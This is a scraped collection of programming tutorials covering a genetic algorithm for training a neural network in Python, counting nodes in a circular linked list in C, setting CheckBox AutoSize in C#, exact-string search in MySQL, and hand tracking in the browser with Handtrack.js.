together, we are ready to go through the GA steps discussed in the tutorial titled “Introduction to Optimization with Genetic Algorithm”. 
The steps are presented in the main figure and also summarized in the next figure." }, { "code": null, "e": 6714, "s": 6499, "text": "Remember that GA uses a fitness function to returns a fitness value for each solution. The higher the fitness value the better the solution. The best solutions are returned as parents in the parents selection step." }, { "code": null, "e": 7033, "s": 6714, "text": "One of the common fitness functions for a classifier such as ANN is the accuracy. It is the ratio between the correctly classified samples and the total number of samples. It is calculated according to the next equation. The classification accuracy of each solution is calculated according to steps in the main figure." }, { "code": null, "e": 7253, "s": 7033, "text": "The single 1D vector of each solution is converted back into 3 matrices, one matrix for each layer (2 hidden and 1 output). Conversion takes place using a function called vector_to_mat(). It is defined in the next code." }, { "code": null, "e": 7850, "s": 7253, "text": "def vector_to_mat(vector_pop_weights, mat_pop_weights): mat_weights = [] for sol_idx in range(mat_pop_weights.shape[0]): start = 0 end = 0 for layer_idx in range(mat_pop_weights.shape[1]): end = end + mat_pop_weights[sol_idx, layer_idx].size curr_vector = vector_pop_weights[sol_idx, start:end] mat_layer_weights = numpy.reshape(curr_vector, newshape=(mat_pop_weights[sol_idx, layer_idx].shape)) mat_weights.append(mat_layer_weights) start = end return numpy.reshape(mat_weights, newshape=mat_pop_weights.shape)" }, { "code": null, "e": 8632, "s": 7850, "text": "It reverses the work done previously. But there is an important question. If the vector of a given solution is just one piece, how we can split into three different parts, each part represents a matrix? The size of the first parameters matrix between the input layer and the hidden layer is 102x150. When being converted into a vector, its length will be 15,300. Because it is the first vector to be inserted in the curr_vector variable according to the mat_to_vector() function, then its indices start from index 0 and end at index 15,299. The mat_pop_weights is used as an argument for the vector_to_mat() function in order to know the size of each matrix. We are not interested in using the weights from the mat_pop_weights variable but just the matrices sizes are used from it." }, { "code": null, "e": 9388, "s": 8632, "text": "For the second vector in the same solution, it will be the result of converting a matrix of size 150x60. Thus the vector length is 9,000. Such a vector is inserted into the curr_vector variable just before the previous vector of length 15,300. As a result, it will start from index 15,300 and ends at index 15,300+9,000–1=24,299. The -1 is used because Python starts indexing at 0. For the last vector created from the parameters matrix of size 60x4, its length is 240. Because it is added into the curr_vector variable exactly after the previous vector of length 9,000, then its index will start after it. That is its start index is 24,300 and its end index is 24,300+240–1=24,539. So, we can successfully restore the vector into the original 3 matrices." }, { "code": null, "e": 9642, "s": 9388, "text": "The matrices returned for each solution are used to predict the class label for each of the 1,962 samples in the used dataset to calculate the accuracy. This is done using 2 functions which are predict_outputs() and fitness() according to the next code." 
}, { "code": null, "e": 10725, "s": 9642, "text": "def predict_outputs(weights_mat, data_inputs, data_outputs, activation=\"relu\"): predictions = numpy.zeros(shape=(data_inputs.shape[0])) for sample_idx in range(data_inputs.shape[0]): r1 = data_inputs[sample_idx, :] for curr_weights in weights_mat: r1 = numpy.matmul(a=r1, b=curr_weights) if activation == \"relu\": r1 = relu(r1) elif activation == \"sigmoid\": r1 = sigmoid(r1) predicted_label = numpy.where(r1 == numpy.max(r1))[0][0] predictions[sample_idx] = predicted_label correct_predictions = numpy.where(predictions == data_outputs)[0].size accuracy = (correct_predictions/data_outputs.size)*100 return accuracy, predictionsdef fitness(weights_mat, data_inputs, data_outputs, activation=\"relu\"): accuracy = numpy.empty(shape=(weights_mat.shape[0])) for sol_idx in range(weights_mat.shape[0]): curr_sol_mat = weights_mat[sol_idx, :] accuracy[sol_idx], _ = predict_outputs(curr_sol_mat, data_inputs, data_outputs, activation=activation) return accuracy" }, { "code": null, "e": 11284, "s": 10725, "text": "The predict_outputs() function accepts the weights of a single solution, inputs, and outputs of the training data, and an optional parameter that specifies which activation function to use. It returns the accuracy of just one solution not all solutions within the population. It order to return the fitness value (i.e. accuracy) of all solutions within the population, the fitness() function loops through each solution, pass it to the predict_outputs() function, store the accuracy of all solutions into the accuracy array, and finally return such an array." }, { "code": null, "e": 11740, "s": 11284, "text": "After calculating the fitness value (i.e. accuracy) for all solutions, the remaining steps of GA in the main figure are applied the same way done previously. The best parents are selected, based on their accuracy, into the mating pool. Then mutation and crossover variants are applied in order to produce the offspring. The population of the new generation is created using both offspring and parents. These steps are repeated for a number of generations." }, { "code": null, "e": 11807, "s": 11740, "text": "The Python implementation for such project has three Python files:" }, { "code": null, "e": 11990, "s": 11807, "text": "ga.py for implementing GA functions.ANN.py for implementing ANN functions.Third file for calling such functions through a number of generations. This is the main file of the project." }, { "code": null, "e": 12027, "s": 11990, "text": "ga.py for implementing GA functions." }, { "code": null, "e": 12066, "s": 12027, "text": "ANN.py for implementing ANN functions." }, { "code": null, "e": 12175, "s": 12066, "text": "Third file for calling such functions through a number of generations. This is the main file of the project." }, { "code": null, "e": 12825, "s": 12175, "text": "The third file is the main file because it connects all functions. It reads the features and the class labels files, filters features based on the standard deviation, creates the ANN architecture, generates the initial solutions, loops through a number of generations by calculating the fitness values for all solutions, selecting best parents, applying crossover and mutation, and finally creating the new population. Its implementation is given below. Such a file defines the GA parameters such as a number of solutions per population, number of selected parents, mutation percent, and number of generations. You can try different values for them." 
}, { "code": null, "e": 16556, "s": 12825, "text": "import numpyimport GAimport pickleimport ANNimport matplotlib.pyplotf = open(\"dataset_features.pkl\", \"rb\")data_inputs2 = pickle.load(f)f.close()features_STDs = numpy.std(a=data_inputs2, axis=0)data_inputs = data_inputs2[:, features_STDs>50]f = open(\"outputs.pkl\", \"rb\")data_outputs = pickle.load(f)f.close()#Genetic algorithm parameters:# Mating Pool Size (Number of Parents)# Population Size# Number of Generations# Mutation Percentsol_per_pop = 8num_parents_mating = 4num_generations = 1000mutation_percent = 10#Creating the initial population.initial_pop_weights = []for curr_sol in numpy.arange(0, sol_per_pop): HL1_neurons = 150 input_HL1_weights = numpy.random.uniform(low=-0.1, high=0.1, size=(data_inputs.shape[1], HL1_neurons)) HL2_neurons = 60 HL1_HL2_weights = numpy.random.uniform(low=-0.1, high=0.1, size=(HL1_neurons, HL2_neurons)) output_neurons = 4 HL2_output_weights = numpy.random.uniform(low=-0.1, high=0.1, size=(HL2_neurons, output_neurons)) initial_pop_weights.append(numpy.array([input_HL1_weights, HL1_HL2_weights, HL2_output_weights]))pop_weights_mat = numpy.array(initial_pop_weights)pop_weights_vector = ga.mat_to_vector(pop_weights_mat)best_outputs = []accuracies = numpy.empty(shape=(num_generations))for generation in range(num_generations): print(\"Generation : \", generation) # converting the solutions from being vectors to matrices. pop_weights_mat = ga.vector_to_mat(pop_weights_vector, pop_weights_mat) # Measuring the fitness of each chromosome in the population. fitness = ANN.fitness(pop_weights_mat, data_inputs, data_outputs, activation=\"sigmoid\") accuracies[generation] = fitness[0] print(\"Fitness\") print(fitness) # Selecting the best parents in the population for mating. parents = ga.select_mating_pool(pop_weights_vector, fitness.copy(), num_parents_mating) print(\"Parents\") print(parents) # Generating next generation using crossover. offspring_crossover = ga.crossover(parents, offspring_size=(pop_weights_vector.shape[0]-parents.shape[0], pop_weights_vector.shape[1])) print(\"Crossover\") print(offspring_crossover) # Adding some variations to the offsrping using mutation. offspring_mutation = ga.mutation(offspring_crossover, mutation_percent=mutation_percent) print(\"Mutation\") print(offspring_mutation) # Creating the new population based on the parents and offspring. pop_weights_vector[0:parents.shape[0], :] = parents pop_weights_vector[parents.shape[0]:, :] = offspring_mutationpop_weights_mat = ga.vector_to_mat(pop_weights_vector, pop_weights_mat)best_weights = pop_weights_mat [0, :]acc, predictions = ANN.predict_outputs(best_weights, data_inputs, data_outputs, activation=\"sigmoid\")print(\"Accuracy of the best solution is : \", acc)matplotlib.pyplot.plot(accuracies, linewidth=5, color=\"black\")matplotlib.pyplot.xlabel(\"Iteration\", fontsize=20)matplotlib.pyplot.ylabel(\"Fitness\", fontsize=20)matplotlib.pyplot.xticks(numpy.arange(0, num_generations+1, 100), fontsize=15)matplotlib.pyplot.yticks(numpy.arange(0, 101, 5), fontsize=15)f = open(\"weights_\"+str(num_generations)+\"_iterations_\"+str(mutation_percent)+\"%_mutation.pkl\", \"wb\")pickle.dump(pop_weights_mat, f)f.close()" }, { "code": null, "e": 16757, "s": 16556, "text": "Based on 1,000 generations, a plot is created at the end of this file using Matplotlib visualization library that shows how the accuracy changes across each generation. It is shown in the next figure." 
}, { "code": null, "e": 17265, "s": 16757, "text": "After 1,000 iterations, the accuracy is more than 97%. This is compared to 45% without using an optimization technique as in the previous tutorial. This is an evidence about why results might be bad not because there is something wrong in the model or the data but because no optimization technique is used. Of course, using different values for the parameters such as 10,000 generations might increase the accuracy. At the end of this file, it saves the parameters in matrix form to the disk for use later." }, { "code": null, "e": 17564, "s": 17265, "text": "The ga.py file implementation is in listed below. Note that the mutation() function accepts the mutation_percent parameter that defines the number of genes to change their values randomly. It is set to 10% in the main file. Such a file holds the 2 new functions mat_to_vector() and vector_to_mat()." }, { "code": null, "e": 20669, "s": 17564, "text": "import numpyimport random# Converting each solution from matrix to vector.def mat_to_vector(mat_pop_weights): pop_weights_vector = [] for sol_idx in range(mat_pop_weights.shape[0]): curr_vector = [] for layer_idx in range(mat_pop_weights.shape[1]): vector_weights = numpy.reshape(mat_pop_weights[sol_idx, layer_idx], newshape=(mat_pop_weights[sol_idx, layer_idx].size)) curr_vector.extend(vector_weights) pop_weights_vector.append(curr_vector) return numpy.array(pop_weights_vector)# Converting each solution from vector to matrix.def vector_to_mat(vector_pop_weights, mat_pop_weights): mat_weights = [] for sol_idx in range(mat_pop_weights.shape[0]): start = 0 end = 0 for layer_idx in range(mat_pop_weights.shape[1]): end = end + mat_pop_weights[sol_idx, layer_idx].size curr_vector = vector_pop_weights[sol_idx, start:end] mat_layer_weights = numpy.reshape(curr_vector, newshape=(mat_pop_weights[sol_idx, layer_idx].shape)) mat_weights.append(mat_layer_weights) start = end return numpy.reshape(mat_weights, newshape=mat_pop_weights.shape)def select_mating_pool(pop, fitness, num_parents): # Selecting the best individuals in the current generation as parents for producing the offspring of the next generation. parents = numpy.empty((num_parents, pop.shape[1])) for parent_num in range(num_parents): max_fitness_idx = numpy.where(fitness == numpy.max(fitness)) max_fitness_idx = max_fitness_idx[0][0] parents[parent_num, :] = pop[max_fitness_idx, :] fitness[max_fitness_idx] = -99999999999 return parentsdef crossover(parents, offspring_size): offspring = numpy.empty(offspring_size) # The point at which crossover takes place between two parents. Usually, it is at the center. crossover_point = numpy.uint32(offspring_size[1]/2) for k in range(offspring_size[0]): # Index of the first parent to mate. parent1_idx = k%parents.shape[0] # Index of the second parent to mate. parent2_idx = (k+1)%parents.shape[0] # The new offspring will have its first half of its genes taken from the first parent. offspring[k, 0:crossover_point] = parents[parent1_idx, 0:crossover_point] # The new offspring will have its second half of its genes taken from the second parent. offspring[k, crossover_point:] = parents[parent2_idx, crossover_point:] return offspringdef mutation(offspring_crossover, mutation_percent): num_mutations = numpy.uint32((mutation_percent*offspring_crossover.shape[1])/100) mutation_indices = numpy.array(random.sample(range(0, offspring_crossover.shape[1]), num_mutations)) # Mutation changes a single gene in each offspring randomly. 
for idx in range(offspring_crossover.shape[0]): # The random value to be added to the gene. random_value = numpy.random.uniform(-1.0, 1.0, 1) offspring_crossover[idx, mutation_indices] = offspring_crossover[idx, mutation_indices] + random_value return offspring_crossover" }, { "code": null, "e": 20906, "s": 20669, "text": "Finally, the ANN.py is implemented according to the code listed below. It contains the implementation of the activation functions (sigmoid and ReLU) in addition to the fitness() and predict_outputs() functions to calculate the accuracy." }, { "code": null, "e": 22141, "s": 20906, "text": "import numpydef sigmoid(inpt): return 1.0 / (1.0 + numpy.exp(-1 * inpt))def relu(inpt): result = inpt result[inpt < 0] = 0 return resultdef predict_outputs(weights_mat, data_inputs, data_outputs, activation=\"relu\"): predictions = numpy.zeros(shape=(data_inputs.shape[0])) for sample_idx in range(data_inputs.shape[0]): r1 = data_inputs[sample_idx, :] for curr_weights in weights_mat: r1 = numpy.matmul(a=r1, b=curr_weights) if activation == \"relu\": r1 = relu(r1) elif activation == \"sigmoid\": r1 = sigmoid(r1) predicted_label = numpy.where(r1 == numpy.max(r1))[0][0] predictions[sample_idx] = predicted_label correct_predictions = numpy.where(predictions == data_outputs)[0].size accuracy = (correct_predictions / data_outputs.size) * 100 return accuracy, predictionsdef fitness(weights_mat, data_inputs, data_outputs, activation=\"relu\"): accuracy = numpy.empty(shape=(weights_mat.shape[0])) for sol_idx in range(weights_mat.shape[0]): curr_sol_mat = weights_mat[sol_idx, :] accuracy[sol_idx], _ = predict_outputs(curr_sol_mat, data_inputs, data_outputs, activation=activation) return accuracy" }, { "code": null, "e": 22193, "s": 22141, "text": "Introduction to Optimization with Genetic Algorithm" }, { "code": null, "e": 22279, "s": 22193, "text": "https://www.linkedin.com/pulse/introduction-optimization-genetic-algorithm-ahmed-gad/" }, { "code": null, "e": 22367, "s": 22279, "text": "https://www.kdnuggets.com/2018/03/introduction-optimization-with-genetic-algorithm.html" }, { "code": null, "e": 22463, "s": 22367, "text": "https://towardsdatascience.com/introduction-to-optimization-with-genetic-algorithm-2f5001d9964b" }, { "code": null, "e": 22510, "s": 22463, "text": "https://www.springer.com/us/book/9781484241660" }, { "code": null, "e": 22569, "s": 22510, "text": "Genetic Algorithm (GA) Optimization — Step-by-Step Example" }, { "code": null, "e": 22662, "s": 22569, "text": "https://www.slideshare.net/AhmedGadFCIT/genetic-algorithm-ga-optimization-stepbystep-example" } ]
Count nodes in Circular linked list in C++
We are given a circular linked list and the task is to calculate the count of nodes present in it.

A circular linked list is a variation of a linked list in which the last element points back to the first element, so the list forms a circle. Both a singly linked list and a doubly linked list can be made into a circular linked list. In the program below, we implement a singly linked list as a circular linked list and calculate the count of nodes in it.

Input − nodes: 20, 1, 2, 3, 4, 5
Output − count of nodes are: 6

Input − nodes: 20, 1, 2, 3, 4, 5, 7, 8, 9, 12
Output − count of nodes are: 10

Approach used in the below program is as follows −

Create the structure for a singly linked list including the address and data held by the node.

Create a push() function that will be used to insert the data into the node.

In the last node, store the address of the first node to make a singly linked list function as a circular linked list.

Create a count function that will count the total number of nodes present in the circular linked list.

#include <stdio.h>
#include <stdlib.h>
/* Defining a node */
struct node {
   int data;
   struct node* next;
};
// Inserting a node in the circular list
void push(struct node** head_ref, int data){
   struct node* ptr1 = (struct node*)malloc(sizeof(struct node));
   struct node* temp = *head_ref;
   ptr1->data = data;
   ptr1->next = *head_ref;
   // going to the last node to insert the new element.
   if (*head_ref != NULL){
      while (temp->next != *head_ref){
         temp = temp->next;
      }
      temp->next = ptr1;
   } else{
      ptr1->next = ptr1; //for first node
   }
   *head_ref = ptr1;
}
// Function to count the number of nodes
int count_fun(struct node* head){
   struct node* temp = head;
   int result = 0;
   if (head != NULL){
      do {
         temp = temp->next;
         result++;
      } while (temp != head);
   }
   return result;
}
int main(){
   /* Initializing the list as empty */
   struct node* head = NULL;
   push(&head, 10);
   push(&head, 20);
   push(&head, 30);
   push(&head, 40);
   printf("count of nodes are: %d", count_fun(head));
   return 0;
}

If we run the above code it will generate the following output −

count of nodes are: 4
How to set the AutoSize of the CheckBox in C#? - GeeksforGeeks
22 Oct, 2021

The CheckBox control is part of a Windows Forms application and is used to take input from the user. In other words, a CheckBox control allows the user to select one or more items from a given list. You can let the CheckBox size itself automatically by using its AutoSize property. The value of this property is of type System.Boolean: set it to true if you want the CheckBox to resize itself according to its content, and false otherwise. The default value of this property is true.

In Windows Forms, you can set this property in two different ways:

1. Design-Time: It is the simplest way to set the AutoSize property of a CheckBox, using the following steps:

Step 1: Create a Windows Forms project: Visual Studio -> File -> New -> Project -> WindowsFormApp

Step 2: Drag the CheckBox control from the ToolBox and drop it on the form. You can place the CheckBox anywhere on the form according to your need.

Step 3: After the drag and drop, go to the properties of the CheckBox control and set the value of the AutoSize property.

Output:

2. Run-Time: It is a little trickier than the above method. In this method, you set the AutoSize property of a CheckBox in code using the following syntax:

public override bool AutoSize { get; set; }

The following steps are used to set the AutoSize property of the CheckBox:

Step 1: Create a checkbox using the CheckBox() constructor provided by the CheckBox class.

// Creating checkbox
CheckBox Mycheckbox = new CheckBox();

Step 2: After creating the CheckBox, set the AutoSize property provided by the CheckBox class.

// Set the AutoSize property of the CheckBox
Mycheckbox.AutoSize = true;

Step 3: Finally, add this checkbox control to the form using the Add() method.

// Add this checkbox to form
this.Controls.Add(Mycheckbox);

Example:

CSharp

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace WindowsFormsApp5 {

public partial class Form1 : Form {

    public Form1()
    {
        InitializeComponent();
    }

    private void Form1_Load(object sender, EventArgs e)
    {
        // Creating and setting the properties of label
        Label l = new Label();
        l.Text = "Select City:";
        l.AutoSize = true;
        l.Location = new Point(233, 111);
        l.Font = new Font("Bradley Hand ITC", 12);

        // Adding label to form
        this.Controls.Add(l);

        // Creating and setting the properties of CheckBox
        CheckBox Mycheckbox = new CheckBox();
        Mycheckbox.Height = 50;
        Mycheckbox.Width = 100;
        Mycheckbox.Location = new Point(229, 136);
        Mycheckbox.Text = "Kolkata";
        Mycheckbox.AutoSize = true;
        Mycheckbox.Font = new Font("Bradley Hand ITC", 12);

        // Adding checkbox to form
        this.Controls.Add(Mycheckbox);

        // Creating and setting the properties of CheckBox
        CheckBox Mycheckbox1 = new CheckBox();
        Mycheckbox1.Height = 50;
        Mycheckbox1.Width = 100;
        Mycheckbox1.Location = new Point(230, 198);
        Mycheckbox1.Text = "Bhubaneswar";
        Mycheckbox1.AutoSize = true;
        Mycheckbox1.Font = new Font("Bradley Hand ITC", 12);

        // Adding checkbox to form
        this.Controls.Add(Mycheckbox1);
    }
}
}

Output:
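One detail worth noting in the example above: because AutoSize is set to true, the explicit Height and Width assignments are effectively ignored and each checkbox sizes itself to fit its Text. The short sketch below is our own illustration (not part of the original article) of how you might observe this at run time from inside the form.

private void ShowAutoSizeEffect()
{
    CheckBox box = new CheckBox();
    box.AutoSize = false;
    box.Width = 100;
    box.Height = 50;
    box.Text = "A fairly long caption for the checkbox";
    this.Controls.Add(box);
    Console.WriteLine("Fixed size: " + box.Size);   // stays at roughly 100 x 50

    // Let the control size itself to its content.
    box.AutoSize = true;
    this.PerformLayout();                           // force a layout pass
    Console.WriteLine("Auto size: " + box.Size);    // should now be large enough to fit the caption
}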
How to search for exact string in MySQL?
You can use the BINARY operator to search for an exact string in MySQL. A normal string comparison uses the column's collation, which is usually case-insensitive; prefixing the comparison with BINARY forces a byte-by-byte, case-sensitive match. The syntax is as follows:

SELECT * FROM yourTableName WHERE BINARY yourColumnName = yourStringValue;

To understand the above syntax, let us create a table. The query to create a table is as follows:

mysql> create table ExactSearch
   -> (
   -> Id int NOT NULL AUTO_INCREMENT,
   -> UserId varchar(10),
   -> UserName varchar(20),
   -> PRIMARY KEY(Id)
   -> );
Query OK, 0 rows affected (0.69 sec)

Insert some records in the table using the insert command. The query is as follows:

mysql> insert into ExactSearch(UserId,UserName) values('USER12','John');
Query OK, 1 row affected (0.11 sec)

mysql> insert into ExactSearch(UserId,UserName) values('12USER','Carol');
Query OK, 1 row affected (0.20 sec)

mysql> insert into ExactSearch(UserId,UserName) values('USER123','Bob');
Query OK, 1 row affected (0.15 sec)

mysql> insert into ExactSearch(UserId,UserName) values('USER231','Sam');
Query OK, 1 row affected (0.18 sec)

Display all records from the table using a select statement:

mysql> select * from ExactSearch;

The following is the output:

+----+---------+----------+
| Id | UserId  | UserName |
+----+---------+----------+
|  1 | USER12  | John     |
|  2 | 12USER  | Carol    |
|  3 | USER123 | Bob      |
|  4 | USER231 | Sam      |
+----+---------+----------+
4 rows in set (0.00 sec)

Here is the query to search for an exact string in MySQL. We are searching for the string 'USER123':

mysql> select * from ExactSearch where binary UserId = 'USER123';

The following is the output:

+----+---------+----------+
| Id | UserId  | UserName |
+----+---------+----------+
|  3 | USER123 | Bob      |
+----+---------+----------+
1 row in set (0.00 sec)
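To see why BINARY matters, compare it with a plain comparison. Assuming the table uses a case-insensitive collation (the usual MySQL default), a lowercase search term still matches the uppercase rows unless BINARY, or an explicit binary collation, is used. The queries below are an illustration on the same table; note that the collation name in the last query is an assumption and must match the column's character set (for example utf8mb4_bin for utf8mb4, latin1_bin for latin1).

-- Case-insensitive by default: this still returns the 'USER123' row.
SELECT * FROM ExactSearch WHERE UserId = 'user123';

-- Exact, case-sensitive match: returns an empty set for 'user123'.
SELECT * FROM ExactSearch WHERE BINARY UserId = 'user123';

-- Equivalent alternative using an explicit binary collation.
SELECT * FROM ExactSearch WHERE UserId COLLATE utf8mb4_bin = 'user123';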
Handtrack.js: Hand Tracking Interactions in the Browser using Tensorflow.js and 3 lines of code. | by Victor Dibia | Towards Data Science
The Handtrack.js library allows you to track a user's hand (as a bounding box) in an image, in any orientation, with 3 lines of code.

A while ago, I was really blown away by results from an experiment using the TensorFlow object detection API to track hands in an image. I made the trained model and source code available, and since then it has been used to prototype some rather interesting use cases (a tool to help kids spell, extensions to predict sign language, hand ping pong, etc). However, while many individuals wanted to experiment with the trained model, a large number still had issues setting up Tensorflow (installation, TF version issues, exporting graphs, etc). Luckily, Tensorflow.js addresses several of these installation/distribution issues, as it is optimized to run in the standardized environment of browsers. To this end, I created Handtrack.js as a library to allow developers to quickly prototype hand/gesture interactions powered by a trained hand detection model.

Runtime: 22 FPS on a Macbook Pro 2018, 2.2 GHz, in the Chrome browser; 13 FPS on a Macbook Pro 2014, 2.2 GHz.

The goal of the library is to abstract away the steps associated with loading the model files, provide helpful functions, and allow a user to detect hands in an image without any ML experience. You do not need to train a model (you can if you want). You do not need to export any frozen graphs or saved models. You can just get started by including handtrack.js in your web application (details below) and calling the library methods.

An interactive demo built using Handtrack.js is here, and the source code on GitHub is here. Love tinkering in Codepen? Here's a handtrack.js example pen you can modify.

You can use handtrack.js simply by including the library URL in a script tag or by importing it from npm using build tools.

The Handtrack.js minified js file is currently hosted using jsdelivr, a free open source CDN that lets you include any npm package in your web application.

<script src="https://cdn.jsdelivr.net/npm/handtrackjs/dist/handtrack.min.js"> </script>

Once the above script tag has been added to your HTML page, you can reference handtrack.js using the handTrack variable as follows.

const img = document.getElementById('img');

handTrack.load().then(model => {
    model.detect(img).then(predictions => {
        console.log('Predictions: ', predictions); // bbox predictions
    });
});

The snippet above prints out bounding box predictions for an image passed in via the img tag. By submitting frames from a video or camera feed, you can then "track" hands in each frame (you will need to keep state of each hand as frames progress).

You can install handtrack.js as an npm package using the following

npm install --save handtrackjs

An example of how you can import and use it in a React app is given below.

import * as handTrack from 'handtrackjs';

const img = document.getElementById('img');

// Load the model.
handTrack.load().then(model => {
    // detect objects in the image.
    console.log("model loaded");
    model.detect(img).then(predictions => {
        console.log('Predictions: ', predictions);
    });
});

If you are interested in prototyping gesture based (body as input) interactive experiences, Handtrack.js can be useful. The user does not need to attach any additional sensors or hardware, but can immediately take advantage of the engagement benefits that result from gesture based/body-as-input interactions.

Some (not all) relevant scenarios are listed below:

When mouse motion can be mapped to hand motion for control purposes.
When an overlap of the hand and other objects can represent meaningful interaction signals (e.g. a touch or selection event for an object).

Scenarios where human hand motion can be a proxy for activity recognition (e.g. automatically tracking movement activity from a video or images of individuals playing chess, or tracking a person's golf swing), or simply counting how many humans are present in an image or video frame.

Interactive art installations. It could be a fun set of controls for interactive art installations.

Teaching others about ML/AI. The handtrack.js library provides a valuable interface to demonstrate how changes in the model parameters (confidence threshold, IoU threshold, image size, etc.) can affect detection results.

You want an accessible demonstration that anyone can easily run or try out with minimal setup.

Several methods are provided. The two main ones are load(), which loads a hand detection model, and detect(), which returns predictions.

load() accepts optional model parameters that allow you to control the performance of the model. This method loads a pretrained hand detection model in the web model format (also hosted via jsdelivr).

detect() accepts an input source parameter (an HTML img, video or canvas object) and returns bounding box predictions for the location of hands in the image.

const modelParams = {
    flipHorizontal: true,   // flip e.g. for video
    imageScaleFactor: 0.7,  // reduce input image size
    maxNumBoxes: 20,        // maximum number of boxes to detect
    iouThreshold: 0.5,      // IoU threshold for non-max suppression
    scoreThreshold: 0.79,   // confidence threshold for predictions
}

const img = document.getElementById('img');

handTrack.load(modelParams).then(model => {
    model.detect(img).then(predictions => {
        console.log('Predictions: ', predictions);
    });
});

Prediction results are of the form

[{
    bbox: [x, y, width, height],
    class: "hand",
    score: 0.8380282521247864
}, {
    bbox: [x, y, width, height],
    class: "hand",
    score: 0.74644153267145157
}]

Other helper methods are also provided:

model.getFPS() : get FPS calculated as the number of detections per second.

model.renderPredictions(predictions, canvas, context, mediasource): draw bounding boxes (and the input mediasource image) on the specified canvas.

model.getModelParameters(): returns the model parameters.

model.setModelParameters(modelParams): updates the model parameters.

dispose() : delete the model instance.

startVideo(video) : start a camera video stream on the given video element. Returns a promise that can be used to validate whether the user granted video permission.

stopVideo(video) : stop the video stream.

Library size: 810 KB. Mainly because it is bundled with the tensorflow.js library (there are some open issues with recent versions that break the library).

Models: 18.5 MB. This is what causes the initial wait when the page is loaded. TF.js webmodels are typically sharded into multiple files (in this case four 4.2 MB files and one 1.7 MB file).
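Putting the calls above together, the following is a minimal sketch (our own illustration, not taken from the original article) of a webcam loop that combines startVideo(), detect() and renderPredictions() on a video and canvas element. The element ids are assumptions for the example, and the value resolved by startVideo() is treated as a boolean, as its description above suggests.

const video = document.getElementById('myvideo');   // <video> element (assumed id)
const canvas = document.getElementById('canvas');   // <canvas> element (assumed id)
const context = canvas.getContext('2d');

handTrack.load().then(model => {
    handTrack.startVideo(video).then(status => {
        if (!status) {
            console.log('Camera permission was not granted');
            return;
        }
        const runDetection = () => {
            model.detect(video).then(predictions => {
                // Draw the bounding boxes on top of the current video frame.
                model.renderPredictions(predictions, canvas, context, video);
                requestAnimationFrame(runDetection);
            });
        };
        runDetection();
    });
});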
Underneath, Handtrack.js uses the Tensorflow.js library, a flexible and intuitive API for building and training models from scratch in the browser. It provides a low-level JavaScript linear algebra library and a high-level layers API.

The data used in this project is primarily from the Egohands dataset. This consists of 4800 images of the human hand with bounding box annotations in various settings (indoor, outdoor), captured using a Google Glass device.

A model is trained to detect hands using the Tensorflow Object Detection API. For this project, a Single Shot MultiBox Detector (SSD) was used with the MobileNetV2 architecture. Results from the trained model were then exported as a savedmodel. Additional details on how the model was trained can be found here and on the Tensorflow Object Detection API github repo.

Tensorflow.js provides a model conversion tool that allows you to convert a savedmodel trained in Tensorflow python to the Tensorflow.js webmodel format that can be loaded in the browser. This process is mainly about mapping operations in Tensorflow python to their equivalent implementation in Tensorflow.js. It makes sense to inspect the saved model graph to understand what is being exported. Finally, I followed the suggestion by the authors of the Tensorflow coco-ssd example [2] in removing the post processing part of the object detection model graph during conversion. This optimization effectively doubled the speed of the detection/prediction operation in the browser.

The library was modeled after the tensorflowjs coco-ssd example (but not written in typescript). It consists of a main class with methods to load the model, detect hands in an image, and a set of other helpful functions, e.g. startVideo, stopVideo, getFPS(), renderPredictions(), getModelParameters(), setModelParameters(), etc. A full description of the methods is on Github.

The source file is then bundled using rollup.js, and published (with the webmodel files) on npm. This is particularly valuable as jsdelivr automatically provides a CDN for npm packages. (It might be the case that hosting the files on other CDNs is faster, and the reader is encouraged to try other methods.) At the moment handtrackjs is bundled with tensorflowjs (v0.13.5), mainly because, as at the time of writing this library, there were version issues where tfjs (v0.15) had datatype errors loading image/video tags as tensors. As new versions fix this issue, it will be updated.

Browsers are single threaded: What this means is that care must be taken to ensure prediction operations do not block the UI thread. Each prediction can take between 50 and 150 ms, which becomes noticeable to a user. For example, when integrating Handtrack.js in an application where the entire screen is rendered many times per second (e.g. in a game), I found it useful to reduce the number of predictions requested per second. In this scenario, Web Workers, an emergent standard which allows running scripts in a background thread, will be useful in preventing UI blocks.

Web Workers are a simple means for web content to run scripts in background threads. The worker thread can perform tasks without interfering with the user interface. In addition, they can perform I/O using XMLHttpRequest (although the responseXML and channel attributes are always null). Once created, a worker can send messages to the JavaScript code that created it by posting messages to an event handler specified by that code (and vice versa). This article provides a detailed introduction to using web workers.

Hands are tracked on a frame by frame basis: If you are interested in identifying hands across frames, you will need to write additional code to infer the ids of detected hands as they enter, move and leave successive frames. Hint: keeping state on the location of each prediction (and the Euclidean distance between predictions) across frames can help; a minimal sketch of this idea is shown below.
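Following that hint, here is a small sketch (our own illustration, not part of the library) that assigns stable ids to detections by matching each new bounding box to the nearest box from the previous frame, using the Euclidean distance between box centres. The 80-pixel threshold is an arbitrary choice for the example.

let tracked = [];        // [{ id, cx, cy }] from the previous frame
let nextId = 0;

function centerOf(prediction) {
    const [x, y, w, h] = prediction.bbox;
    return { cx: x + w / 2, cy: y + h / 2 };
}

// Match current predictions to previous ones by nearest centre.
function assignIds(predictions, maxDistance = 80) {
    const current = predictions.map(p => ({ ...centerOf(p), prediction: p }));
    const unmatched = [...tracked];

    current.forEach(c => {
        let best = null;
        let bestDist = Infinity;
        unmatched.forEach((t, i) => {
            const d = Math.hypot(c.cx - t.cx, c.cy - t.cy);
            if (d < bestDist) { bestDist = d; best = i; }
        });
        if (best !== null && bestDist < maxDistance) {
            c.id = unmatched[best].id;       // same hand as in the last frame
            unmatched.splice(best, 1);
        } else {
            c.id = nextId++;                 // a new hand entered the frame
        }
    });

    tracked = current.map(c => ({ id: c.id, cx: c.cx, cy: c.cy }));
    return current;                          // each entry: { id, cx, cy, prediction }
}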
Incorrect predictions: There will be the occasional incorrect prediction (sometimes a face is detected as a hand). I found that each camera and lighting condition needed different settings for the model parameters (especially confidence thresholds) to get good detection. More importantly, this can be improved with additional data.

I really look forward to seeing how others who use or extend this project solve some of these limitations.

Handtrack.js represents really early steps with respect to the overall potential of enabling new forms of human computer interaction with AI, in the browser. Already, there have been excellent ideas such as posenet for human pose detection, and handsfree.js for facial expression detection in the browser.

Above all, the reader is invited to imagine. Imagine interesting use cases where knowing the location of a user's hand can make for more engaging interactions.

In the meantime, I will be spending more time on the following:

